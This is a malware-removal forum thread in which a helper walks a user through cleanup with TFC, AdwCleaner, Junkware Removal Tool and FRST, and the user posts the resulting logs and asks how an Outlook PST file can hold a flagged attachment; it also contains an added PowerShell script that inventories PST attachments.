Durchsuchte Objekte: 310708
Laufzeit: 9 Minute(n), 8 Sekunde(n)

Infizierte Speicherprozesse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Speichermodule: 0
(Keine bösartigen Objekte gefunden)

Infizierte Registrierungsschlüssel: 2
HKCU\Software\InstallCore\1I1T1Q1S (PUP.Optional.InstallCore.A) -> Erfolgreich gelöscht und in Quarantäne gestellt.
HKCU\SOFTWARE\INSTALLCORE (PUP.Optional.InstallCore.A) -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Registrierungswerte: 1
HKCU\Software\InstallCore|tb (PUP.Optional.InstallCore.A) -> Daten: 1W1G1U1K1O1H -> Erfolgreich gelöscht und in Quarantäne gestellt.

Infizierte Dateiobjekte der Registrierung: 0
(Keine bösartigen Objekte gefunden)

Infizierte Verzeichnisse: 0
(Keine bösartigen Objekte gefunden)

Infizierte Dateien: 4
C:\$Recycle.Bin\S-1-5-21-1797653687-739084669-777346648-1001\$ROMGUCE.exe (PUP.Optional.RegCleanerPro) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\$Recycle.Bin\S-1-5-21-1797653687-739084669-777346648-1001\$RWBRD16.zip (Backdoor.Agent.WRRGen) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Users\*****\AppData\Local\Temp\4wSV1AXm.exe.part (PUP.Optional.Somoto) -> Erfolgreich gelöscht und in Quarantäne gestellt.
C:\Users\*****\AppData\Local\Temp\JeCbx_5v.exe.part (PUP.Optional.SweetIM) -> Erfolgreich gelöscht und in Quarantäne gestellt.

(Ende)
         
Thumbnails of attached images
TR/Crypt.Xpack.41536 in der Outlook .pst-alle.jpg  

Alt 15.01.2014, 10:31   #2
schrauber
/// the machine
/// TB-Ausbilder
 




hi,

Please download TFC (by Oldtimer) and save the file to your desktop.
Now close all open programs and disconnect from the internet.
Double-click TFC.exe and press Start.
If TFC cannot delete all files it will ask for a restart. Please allow this.



Please download AdwCleaner to your desktop.
  • Close all open programs and browsers. Illustrated guide to AdwCleaner.
  • Start AdwCleaner.exe with a double-click.
  • Accept the terms of use.
  • Click Options and make sure the following items are selected:
    • Delete "Tracing" keys
    • Reset Winsock settings
    • Reset proxy settings
    • Reset Internet Explorer policies
    • Reset Chrome policies
    • Make sure all 5 options are selected as shown here
  • Click Scan and wait until it has finished.
  • Now click Clean and confirm any prompts with OK.
  • Your computer will restart automatically. After the restart a text file opens. Post its contents in your next reply.
  • You can also find the log file at C:\AdwCleaner\AdwCleaner[Cx].txt (x = sequential number).

Please close your security software to avoid possible conflicts.
Please download Junkware Removal Tool to your desktop

  • Start the tool with a double-click. On Windows Vista (or higher) please right-click and choose "Run as administrator".
  • Press any key to start the tool.
  • Depending on the system the scan may take a while.
  • When the tool is done, the log file (JRT.txt) is saved to the desktop and opened automatically.
  • Please post the contents of JRT.txt in your next reply.


and a fresh FRST log please.


For Outlook:
The only option is to import the PST file again and search manually for which email or attachment is affected, then delete it.
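To illustrate the manual search recommended above (an added example written for this edit, not code from schrauber or the board): a PowerShell script that mounts a PST through Outlook's COM interface, lists every mail attachment with folder, sender and subject, and flags file extensions that commonly carry executable content, so the item the scanner objected to can be located and deleted in Outlook. Assumptions: Outlook is installed, the PST path and export folder are placeholders, and the risky-extension list is my own choice.

```powershell
# Added example (not from the thread): inventory attachments inside a PST via Outlook COM.
# Placeholders: -PstPath and -ExportDir. Run with Outlook closed; nothing is deleted here.
param(
    [string]$PstPath   = 'C:\PLACEHOLDER\archiv1.pst',                   # placeholder path
    [string]$ExportDir = "$env:USERPROFILE\Desktop\pst-attachments",     # assumed location
    [switch]$Export                                                       # also write flagged files
)

# Extensions that commonly carry executable content (assumed list, adjust as needed)
$riskyExt = '.exe','.scr','.com','.pif','.bat','.cmd','.js','.jse','.vbs','.vbe',
            '.wsf','.hta','.jar','.lnk','.zip','.rar','.7z','.cab'

$outlook = New-Object -ComObject Outlook.Application
$ns      = $outlook.GetNamespace('MAPI')
$ns.AddStore($PstPath)                                   # attach the PST to the current profile
$store   = $ns.Stores | Where-Object { $_.FilePath -ieq $PstPath }
if (-not $store) { throw "PST could not be mounted: $PstPath" }
$root    = $store.GetRootFolder()

New-Item -ItemType Directory -Path $ExportDir -Force | Out-Null
$script:exportCount = 0

function Get-PstAttachments([object]$Folder) {
    foreach ($item in @($Folder.Items)) {
        if ($item.Class -ne 43) { continue }             # 43 = olMail; skip contacts, appointments
        foreach ($att in @($item.Attachments)) {
            $ext     = [IO.Path]::GetExtension($att.FileName).ToLowerInvariant()
            $isRisky = $riskyExt -contains $ext
            if ($Export -and $isRisky) {
                # Write with a neutral ".bin" suffix so a stray double-click cannot run it;
                # the on-access scanner inspects the file as it is written.
                $script:exportCount++
                $safe = '{0:D4}_{1}.bin' -f $script:exportCount,
                        ($att.FileName -replace '[\\/:*?"<>|]', '_')
                $att.SaveAsFile((Join-Path $ExportDir $safe))
            }
            [pscustomobject]@{
                Folder   = $Folder.FolderPath
                Received = $item.ReceivedTime
                From     = $item.SenderEmailAddress
                Subject  = $item.Subject
                File     = $att.FileName
                Bytes    = $att.Size
                Risky    = $isRisky
            }
        }
    }
    foreach ($sub in @($Folder.Folders)) { Get-PstAttachments $sub }   # recurse into subfolders
}

$report = Get-PstAttachments $root
$report | Sort-Object Received |
    Export-Csv -Path (Join-Path $ExportDir 'attachments.csv') -NoTypeInformation -Encoding UTF8
# Flagged items first; the full inventory is in attachments.csv
$report | Where-Object Risky | Format-Table Received, From, Subject, File, Bytes -AutoSize

$ns.RemoveStore($root)                                   # detach the PST from the profile again
```

The CSV gives the folder and subject of every message carrying an attachment, which is enough to open the matching mail in Outlook and delete it; the script itself changes nothing in the PST.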

Alt 15.01.2014, 12:04   #3
franz12
 



Many thanks - the new logs are below.

Regarding Outlook .pst: do you mean I should look through the folders for suspicious mails, then save them locally and scan them? Are there any tools for this? In general I can hardly imagine viruses getting into Outlook. First the mails are checked by one of the big hosting providers, then by Microsoft Security Essentials, then by Outlook itself, and finally I still decide what I open. I don't quite understand how viruses get into the PST here.
Can the .pst be infected as a whole (the entire file), or is it always only about individual mails stored in the .pst?

TFC (by Oldtimer)
Code:
ATTFilter
Getting user folders.
 
Stopping running processes.
 
Emptying Temp folders.
 
 
User: Admin
->Temp folder emptied: 10172507 bytes
->Temporary Internet Files folder emptied: 1350191 bytes
->Java cache emptied: 842 bytes
->FireFox cache emptied: 82977884 bytes
->Flash cache emptied: 592 bytes
 
User: All Users
 
User: Default
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 41620 bytes
 
User: Default User
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 0 bytes
 
User: *****
->Temp folder emptied: 11231320715 bytes
->Temporary Internet Files folder emptied: 754312207 bytes
->Java cache emptied: 36578 bytes
->FireFox cache emptied: 437468929 bytes
->Google Chrome cache emptied: 21853849 bytes
->Apple Safari cache emptied: 128000 bytes
->Flash cache emptied: 89297 bytes
 
User: Public
 
User: test
->Temp folder emptied: 1003760 bytes
->Temporary Internet Files folder emptied: 172796 bytes
->Java cache emptied: 0 bytes
->FireFox cache emptied: 86578084 bytes
->Flash cache emptied: 42256 bytes
 
User: UpdatusUser
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 0 bytes
->Flash cache emptied: 41620 bytes
 
%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 0 bytes
%systemroot%\System32 (64bit) .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 1007627252 bytes
%systemroot%\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 33298 bytes
%systemroot%\system32\config\systemprofile\AppData\LocalLow\Sun\Java\Deployment folder emptied: 755 bytes
%systemroot%\sysnative\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files folder emptied: 42304047 bytes
 
Emptying RecycleBin. Do not interrupt.
 
RecycleBin emptied: 72697355433 bytes
Process complete!
 
Total Files Cleaned = 82.374,00 mb
         
AdwCleaner
AdwCleaner Logfile:
Code:
ATTFilter
# AdwCleaner v3.017 - Bericht erstellt am 15/01/2014 um 11:04:12
# Aktualisiert 12/01/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium Service Pack 1 (64 bits)
# Benutzername : ***** - *****-PC
# Gestartet von : G:\Users\*****\Documents\*****\***** Hacker\trojaner-board.de\adwcleaner.exe
# Option : Löschen

***** [ Dienste ] *****


***** [ Dateien / Ordner ] *****

Ordner Gelöscht : C:\ProgramData\Partner
Ordner Gelöscht : C:\Program Files (x86)\Vuze
Ordner Gelöscht : C:\Program Files (x86)\Common Files\DVDVideoSoft\TB
Ordner Gelöscht : C:\Users\*****\AppData\Roaming\dvdvideosoftiehelpers
Ordner Gelöscht : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\c0zhqkuq.default\Extensions\{ACAA314B-EEBA-48E4-AD47-84E31C44796C}
Datei Gelöscht : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\c0zhqkuq.default\user.js
Datei Gelöscht : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\user.js

***** [ Verknüpfungen ] *****


***** [ Registrierungsdatenbank ] *****

Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\secman.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\WLXQuickTimeShellExt.DLL
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\protector_dll.protectorbho
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\protector_dll.protectorbho.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\secman.OutlookSecurityManager
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\secman.OutlookSecurityManager.1
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\AskInstallChecker-1_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\AskInstallChecker-1_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_fuer_free-3d-photo-maker_RASAPI32
Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Tracing\SoftonicDownloader_fuer_free-3d-photo-maker_RASMANCS
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{0A18A436-2A7A-49F3-A488-30538A2F6323}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{4D076AB4-7562-427A-B5D2-BD96E19DEE56}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{007EFBDF-8A5D-4930-97CC-A4B437CBA777}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{826D7151-8D99-434B-8540-082B8C2AE556}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{11549FE4-7C5A-4C17-9FC3-56FC5162A994}
Schlüssel Gelöscht : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{70D46D94-BF1E-45ED-B567-48701376298E}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8EEE}
Schlüssel Gelöscht : [x64] HKLM\SOFTWARE\Classes\Interface\{66EEF543-A9AC-4A9D-AA3C-1ED148AC8FFE}
Schlüssel Gelöscht : HKCU\Software\OCS
Schlüssel Gelöscht : HKCU\Software\Softonic
Schlüssel Gelöscht : HKCU\Software\YahooPartnerToolbar

***** [ Browser ] *****

-\\ Internet Explorer v11.0.9600.16428


-\\ Mozilla Firefox v26.0 (de)

[ Datei : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\c0zhqkuq.default\prefs.js ]


[ Datei : C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\prefs.js ]


[ Datei : C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jla7zlsk.default\prefs.js ]


[ Datei : C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\fag0belg.default\prefs.js ]


-\\ Google Chrome v31.0.1650.63

[ Datei : C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\preferences ]


*************************

AdwCleaner[R0].txt - [4195 octets] - [15/01/2014 10:47:53]
AdwCleaner[S0].txt - [3835 octets] - [15/01/2014 11:04:12]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [3895 octets] ##########
         
--- --- ---


Junkware Removal Tool
Code:
ATTFilter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.1.0 (01.07.2014:1)
OS: Windows 7 Home Premium x64
Ran by ***** on 15.01.2014 at 11:39:42,63
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




~~~ Services



~~~ Registry Values



~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_CURRENT_USER\Software\caphyon
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\caphyon
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updatewhilokii_rasapi32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\updatewhilokii_rasmancs



~~~ Files



~~~ Folders

Successfully deleted: [Folder] "C:\Users\*****\AppData\Roaming\getrighttogo"



~~~ FireFox

Emptied folder: C:\Users\*****\AppData\Roaming\mozilla\firefox\profiles\v60bhm7j.default\minidumps [185 files]



~~~ Event Viewer Logs were cleared





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 15.01.2014 at 11:45:06,99
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         
a fresh FRST log

FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 15-01-2014
Ran by ***** (administrator) on *****-PC on 15-01-2014 11:45:57
Running from G:\Users\*****\Documents\*****\***** Hacker\trojaner-board.de
Windows 7 Home Premium Service Pack 1 (X64) OS Language: German Standard
Internet Explorer Version 11
Boot Mode: Normal

The only official downoad link fo FRST:
Download link for 32-Bit version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: hxxp://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(SEIKO EPSON CORPORATION) C:\Program Files (x86)\Common Files\EPSON\EBAPI\eEBSvc.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedul2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements Organizer 8.0\PhotoshopElementsFileAgent.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\avmike.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\certsrv.exe
(Devguru Co., Ltd.) C:\Windows\SysWOW64\dgdersvc.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\esClient.exe
() C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe
() C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
(Acer Incorporated) C:\Program Files (x86)\Acer\Registration\GregHSRW.exe
(Hauppauge Computer Works) C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe
(AVM Berlin) C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe
(TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
() C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAAnotif.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Acronis) C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe
(Microsoft Corporation) C:\Windows\vVX1000.exe
(Microsoft Corporation) C:\Windows\WindowsMobile\wmdc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
() C:\OEM\USBDECTION\USBS3S4Detection.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(NewTech Infosystems, Inc.) C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe
() C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe
(CyberLink Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe
(Acer Corp.) C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe
(Adobe Sytems Incorporated) C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe
(Acronis) C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe
(Google) C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\ControlCenter3\BrccMCtl.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Brother\Brmfcmon\BrMfimon.exe
(Audible, Inc.) C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSConnector.exe
(pdfforge  hxxp://www.pdfforge.org/) C:\Program Files (x86)\Common Files\PDFCreator\PDFCreator.exe
() C:\Program Files (x86)\Northstar\SmartCopy\SmartCopy.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Firebird Project) C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe
(North Star com.) C:\Program Files (x86)\Northstar\SmartLauncher\SmartLauncher.exe
(Microsoft Corporation) C:\Program Files\Windows Home Server\WHSTrayApp.exe
(Hauppauge Computer Works, Inc.) C:\Program Files (x86)\WinTV\WinTV7\WinTVTray.exe
(Dropbox, Inc.) C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Windows\System32\prevhost.exe
(Helios Software Solutions) C:\Program Files (x86)\TextPad 4\TextPad.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\SysWOW64\notepad.exe


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [mwlDaemon] - C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\mwlDaemon.exe [349480 2009-09-10] (Egis Technology Inc.)
HKLM\...\Run: [IAAnotif] - C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-10-13] (Intel Corporation)
HKLM\...\Run: [RtHDVCpl] - C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8312352 2009-10-28] (Realtek Semiconductor)
HKLM\...\Run: [OOTag] - C:\windows\oobeoffer\oobeoffer\ootag.exe [23072 2009-09-28] (Microsoft)
HKLM\...\Run: [Acronis Scheduler2 Service] - C:\Program Files (x86)\Common Files\Acronis\Schedule2\schedhlp.exe [140568 2007-08-31] (Acronis)
HKLM\...\Run: [VX1000] - C:\Windows\vVX1000.exe [762736 2010-05-20] (Microsoft Corporation)
HKLM\...\Run: [Windows Mobile Device Center] - C:\Windows\WindowsMobile\wmdc.exe [660360 2007-05-31] (Microsoft Corporation)
HKLM\...\Run: [MSC] - C:\Program Files\Microsoft Security Client\msseces.exe [1266912 2013-10-23] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [472992 2013-03-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [JMB36X IDE Setup] - C:\Windows\RaidTool\xInsIDE.exe [36864 2007-03-20] ()
HKLM-x32\...\Run: [BackupManagerTray] - C:\Program Files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe [261888 2009-08-12] (NewTech Infosystems, Inc.)
HKLM-x32\...\Run: [Hotkey Utility] - C:\Program Files (x86)\Acer\Hotkey Utility\HotkeyUtility.exe [609312 2010-05-06] ()
HKLM-x32\...\Run: [EgisTecLiveUpdate] - C:\Program Files (x86)\EgisTec Egis Software Update\EgisUpdate.exe [199464 2009-08-04] (Egis Technology Inc.)
HKLM-x32\...\Run: [ArcadeDeluxeAgent] - C:\Program Files (x86)\Acer Arcade Deluxe\Acer Arcade Deluxe\ArcadeDeluxeAgent.exe [128296 2009-11-16] (CyberLink Corp.)
HKLM-x32\...\Run: [PlayMovie] - C:\Program Files (x86)\Acer Arcade Deluxe\PlayMovie\PMVService.exe [181480 2009-11-12] (Acer Corp.)
HKLM-x32\...\Run: [TrayServer] - C:\Program Files (x86)\MAGIX\Video_deluxe_15\Trayserver.exe [90112 2008-08-07] (MAGIX AG)
HKLM-x32\...\Run: [Adobe Version Cue CS2] - C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe [856064 2005-04-06] (Adobe Sytems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 7.0] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Distillr\acrotray.exe [483328 2008-04-23] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] - [x]
HKLM-x32\...\Run: [BrMfcWnd] - C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1159168 2009-05-26] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [ControlCenter3] - C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [TrueImageMonitor.exe] - C:\Program Files (x86)\Acronis\TrueImageHome\TrueImageMonitor.exe [2622232 2007-08-31] (Acronis)
HKLM-x32\...\Run: [AcronisTimounterMonitor] - C:\Program Files (x86)\Acronis\TrueImageHome\TimounterMonitor.exe [907040 2007-08-31] (Acronis)
HKLM-x32\...\Run: [Google Desktop Search] - C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
HKLM-x32\...\Run: [LifeCam] - C:\Program Files (x86)\Microsoft LifeCam\LifeExp.exe [119152 2010-05-20] (Microsoft Corporation)
HKLM-x32\...\Run: [DivXUpdate] - C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1259376 2011-07-29] ()
HKLM-x32\...\Run: [Adobe ARM] - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] - C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59280 2012-11-28] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] - C:\Program Files (x86)\iTunes\iTunesHelper.exe [152544 2012-12-12] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] - C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKCU\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKCU\...\Run: [updateMgr] - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AdobeUpdateManager.exe [313472 2006-03-30] (Adobe Systems Incorporated)
HKCU\...\Run: [KiesTrayAgent] - C:\Program Files (x86)\Samsung\Kies\/\KiesTrayAgent.exe [3365176 2010-05-14] (Samsung Electronics Co., Ltd.)
MountPoints2: {59c8f615-9a4a-11df-a62d-806e6f6e6963} - E:\wubi.exe
MountPoints2: {a6801d55-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
MountPoints2: {a6801d61-6f88-11e3-9574-90fba686407f} - I:\AutoRun.exe
HKU\Admin\...\Run: [swg] - C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2009-11-18] (Google Inc.)
HKU\Default\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\Default User\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
HKU\UpdatusUser\...\RunOnce: [ScrSav] - C:\Program Files (x86)\Acer\Screensaver\run_Acer.exe [162336 2009-07-22] ()
AppInit_DLLs-x32: C:\PROGRA~2\Google\GOOGLE~3\GO36F4~1.DLL [123392 2010-12-20] (Google)
Lsa: [Authentication Packages] msv1_0 relog_ap
Startup: C:\Users\*****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\*****\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_m7811&r=17361210n705pe426v155w5741u221
SearchScopes: HKLM-x32 - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW
SearchScopes: HKCU - {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7ACAW_deAT409AT409
BHO: Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
BHO: BrowserHelper Class - {9A065C65-4EE7-4DDD-9918-F129089A894A} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
